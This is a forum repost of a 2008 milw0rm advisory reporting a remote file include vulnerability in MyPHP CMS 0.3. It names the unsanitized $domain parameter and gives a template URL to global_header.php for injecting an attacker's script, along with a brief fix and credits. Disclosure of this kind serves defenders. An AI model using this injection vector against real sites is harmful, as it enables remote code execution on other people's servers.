Guest Nemessis Posted April 26, 2008 Report Share Posted April 26, 2008 http://www.milw0rm.com/exploits/1983---------------------------------------------------------------------------MyPHP CMS <= 0.3 (domain) Remote File Include Vulnerabilities---------------------------------------------------------------------------Discovered By Kw3[R]Ln [ Romanian Security Team ] : hTTp://rstcenter.com :Remote : YesCritical Level : Dangerous---------------------------------------------------------------------------Affected software description :~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Application : MyPHP CMSversion : latest version [ 0.3 ]URL : http://sourceforge.net/projects/myphpcms------------------------------------------------------------------Exploit:~~~~~~~Variable $domain not sanitized.When register_globals=on an attacker can exploit this vulnerability with a simple php injection script.# http://www.site.com/[path]/styles/default/global_header.php?installed=23&domain=[Evil_Script]---------------------------------------------------------------------------Solution :~~~~~~~~~declare variabel $domain---------------------------------------------------------------------------Shoutz:~~~~~# Special greetz to my good friend [Oo]# To all members of h4cky0u.org and RST [ hTTp://RoSecurityGroup.net ]---------------------------------------------------------------------------*/Contact:~~~~~~~Nick: Kw3rLnE-mail: ciriboflacs[at]YaHoo[dot]ComHomepage: hTTp://RoSecurityGroup.net/*-------------------------------- [ EOF] ----------------------------------# Further Notesif ( !isset ( $installed ) ){ header ( "Location: install_sql.php" );}added installed to the get request for the vulnerability to work correctly./str0ke Quote Link to comment Share on other sites More sharing options...